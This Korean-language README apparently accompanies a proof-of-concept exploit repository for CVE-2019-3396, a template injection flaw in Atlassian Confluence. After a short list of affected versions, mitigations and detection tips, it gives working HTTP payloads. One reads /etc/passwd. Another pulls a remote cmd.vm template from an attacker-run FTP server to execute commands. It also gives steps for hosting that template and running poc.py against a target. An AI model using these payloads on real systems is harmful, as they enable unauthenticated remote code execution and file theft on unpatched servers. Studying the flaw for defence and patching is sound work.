CVE-2019-3396
CVE-2019-3396 confluence SSTI RCE
🔎 CVE-2019-3396란?
- Atlassian Confluence의 심각한 버그입니다.
- 유형: 템플릿 인젝션 + 경로 탐색
- 위험: 로그인 없이 원격 코드 실행(RCE) 가능
- 상태: 야생에서 악용됨
🛑 영향을 받는 버전
- 6.6.0 ~ 6.6.11 ❌ 취약
- 6.6.12 ✅ 수정됨
- 6.12.0 ~ 6.12.2 ❌ 취약
- 6.12.3 ✅ 수정됨
- 6.13.0 ~ 6.13.2 ❌ 취약
- 6.13.3 ✅ 수정됨
- 6.14.0 ~ 6.14.1 ❌ 취약
- 6.14.2 ✅ 수정됨
👉 자세한 내용은 항상 Atlassian 공식 권고를 확인하세요.
💥 영향
- 완전한 서버 장악
- 데이터 탈취, 랜섬웨어, 암호화폐 채굴기
- 공격자는 원하는 모든 코드를 실행할 수 있음
🔐 완화 조치
- ✅ 업그레이드하여 패치된 Confluence 버전 사용 (최선의 조치)
- 🚫 즉시 패치할 수 없는 경우 위젯 커넥터 매크로 비활성화
- 🔒 액세스 제한 (수정될 때까지 내부 전용)
👀 탐지 (안전한 팁)
- 매크로/미리보기 엔드포인트에 대한 이상한 요청을 로그에서 모니터링
- 비정상적인 프로세스 또는 아웃바운드 트래픽 확인
- 취약점 스캐너를 사용하여 버전 확인
📂 파일 읽기
POST /rest/tinymce/1/macro/preview HTTP/2
Host: {***}
{"macro":{"params":{"_template":"file:///etc/passwd"}}}
명령 실행
POST /rest/tinymce/1/macro/preview HTTP/2
Host: ***
{"contentId":"1","macro":{"name":"widget","params":{"_template":"ftp://***:8888/cmd.vm","command":"id"},"body":""}}
자동화
- VPS에 cmd.vm 업로드
- 이 cmd.vm 파일에 대한 링크를 만들기 위해 ftp 또는 https 사용
pip install pyftpdlib
python -m pyftpdlib -p 8888
- poc.py 파일의 pyftp 값을 업데이트: pyftp = "ftp://10.100.10.100:8888/cmd.vm"
python poc.py <url> <cmd>
python poc.py https://ip:port "id"
⚠️ 팁 — 이 저장소는 교육, 방어 및 인식 제고 용도로만 사용하세요.
🔗 참고 자료